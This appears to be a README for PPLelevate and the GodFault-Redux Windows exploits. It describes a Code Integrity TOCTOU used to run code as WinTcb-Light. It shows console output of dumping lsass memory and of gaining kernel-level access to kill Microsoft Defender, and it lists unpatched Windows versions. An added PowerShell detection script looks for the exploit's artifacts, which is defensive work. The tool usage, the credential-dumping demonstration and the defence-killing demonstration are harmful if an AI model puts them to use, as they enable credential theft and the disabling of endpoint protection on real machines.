Elevate process to PPL status using GodFault-Redux exploit.
This is a minimalist extension to Gabriel Landau's GodFault-Redux exploit which allows elevating either a specified process or the calling process to PPL-AntiMalware.
Usage: `PPLelevate <Process ID (optional)>`
Calling it without an argument elevates the calling process itself. This grants the elevated process access to, for example, the Microsoft-Windows-Threat-Intelligence ETW provider.
Thanks to Gabriel Landau for GodFault-Redux.
By Gabriel Landau at Elastic Security.
A variant of the now-patched PPLFault exploit which bypasses Microsoft's mitigation for PPLFault.
Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light and then dump a specified process. For more details on the exploit, see our research:
Demo video: 2026-02-08-Redux-GodFault-Demo.mp4
```
PS C:\Users\user\Desktop> cmd /c ver
Microsoft Windows [Version 10.0.20348.4773]
PS C:\Users\user\Desktop> $TargetPid = (Get-Process lsass).Id
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid $TargetPid).Protection

Type           Signer
----           ------
ProtectedLight Lsa

PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\Redux.exe -v $TargetPid lsass.dmp
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
[+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Give the memory manager a moment to think
[+] Emptying system working set
[+] Working set purged
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Successfully hydrated file: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Dump saved to: lsass.dmp
[+] Dump is 49.1 MB
[+] Operation took 2109 ms
PS C:\Users\user\Desktop> dir *.dmp

    Directory: C:\Users\user\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/11/2026   4:17 PM       51500633 lsass.dmp
```
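The two things a defender can look for after reading the PPLelevate description and the Redux transcript above are a PPL-AntiMalware process that is not a known security product, and the on-disk artifacts the tool prints (the `.bak` backup and the `C:\PPLFaultTemp` staging directory). The following check is an added example, not part of GodFault-Redux or PPLelevate; it uses `Get-NtProcess` from NtObjectManager as the transcript does, assumes the `Win32ImagePath` and `ProcessId` properties of that module's process objects, and uses a constructed allow-list that must be adapted to the host.

```powershell
# Added detection check (not GodFault-Redux code). Run from an elevated prompt
# with NtObjectManager installed; .Win32ImagePath / .ProcessId are assumed from
# that module, only .Protection (Type, Signer) appears in the transcript above.
Import-Module NtObjectManager -ErrorAction Stop

# Constructed allow-list: images expected to run as PPL-AntiMalware on this host.
$KnownAntimalware = @(
    'C:\ProgramData\Microsoft\Windows Defender\Platform\*\MsMpEng.exe',
    'C:\ProgramData\Microsoft\Windows Defender\Platform\*\NisSrv.exe'
)

# Artifacts named in the Redux output: benign backup and staging directory.
$Artifacts = @(
    'C:\Windows\System32\EventAggregation.dll.bak',
    'C:\PPLFaultTemp'
)

function Test-UnexpectedPpl {
    # Open every process we can query and report PPL-AntiMalware ones that
    # are not on the allow-list (e.g. a process elevated by PPLelevate).
    Get-NtProcess -Access QueryLimitedInformation | ForEach-Object {
        $p = $_
        if ($p.Protection.Type -eq 'ProtectedLight' -and
            $p.Protection.Signer -eq 'Antimalware') {
            $allowed = $false
            foreach ($pattern in $KnownAntimalware) {
                if ($p.Win32ImagePath -like $pattern) { $allowed = $true; break }
            }
            if (-not $allowed) {
                [pscustomobject]@{
                    ProcessId = $p.ProcessId
                    Image     = $p.Win32ImagePath
                    Note      = 'PPL-AntiMalware process not on allow-list'
                }
            }
        }
        $p.Dispose()
    }
}

function Test-ReduxArtifacts {
    # A leftover backup or staging directory indicates an interrupted or
    # uncleaned run of the exploit.
    foreach ($path in $Artifacts) {
        if (Test-Path -LiteralPath $path) {
            [pscustomobject]@{ Path = $path; Note = 'GodFault-Redux artifact present' }
        }
    }
}

Test-UnexpectedPpl
Test-ReduxArtifacts
```

Feed the two result sets to whatever alerting you already have; an empty result from both is the expected steady state.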
Exploits the same TOCTOU as Redux. However, instead of dumping a process, it migrates to CSRSS and exploits a vulnerability in win32k!NtUserHardErrorControlCall from ANGRYORCHARD to decrement KTHREAD.PreviousMode from UserMode (1) to KernelMode (0). It proves "God Mode" access by killing a normally unkillable process, such as MsMpEng.exe.
```
PS C:\Users\user\Desktop> (Get-Process MsMpEng).Id
844
PS C:\Users\user\Desktop> taskkill /f /pid 844
ERROR: The process with PID 844 could not be terminated.
Reason: Access is denied.
PS C:\Users\user\Desktop> .\GodFault-Redux.exe -k MsMpEng.exe
[+] Thread 5668 (KTHREAD FFFFB9043ACB2080) has been blessed by GodFault
[+] Initial blessing successful
[+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
[+] Opened \Device\PhysicalMemory. Handle is 0x14c
[+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x148
[+] GodFault killed process 844: MsMpEng.exe
PS C:\Users\user\Desktop> (Get-Process MsMpEng).Id
Get-Process : Cannot find a process with the name "MsMpEng". Verify the process name and call the cmdlet again.
At line:1 char:2
+ (Get-Process MsMpEng).Id
+  ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (MsMpEng:String) [Get-Process], ProcessCommandException
    + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand
```
| Operating System | Lifecycle | Fix Status |
|---|---|---|
| Windows 11 24H2 | Mainstream Support | ✔ Fixed |
| Windows 10 Enterprise LTSC 2021 | Mainstream Support | ❌ Still functional as of February 2026 (19044.6937) |
| Windows Server 2025 | Mainstream Support | ✔ Fixed |
| Windows Server 2022 | Mainstream Support | ❌ Still functional as of February 2026 (20348.4773) |
| Windows Server 2019 | Extended Support | ❌ Still functional as of February 2026 (17763.8389) |
Redux is covered by the ELv2 license. It uses phnt from SystemInformer under the MIT license.
Redux is based on our prior work, PPLFault, which was inspired by PPLdump by Clément Labro.
ANGRYORCHARD was created by Austin Hudson, who released it when Microsoft patched PPLdump.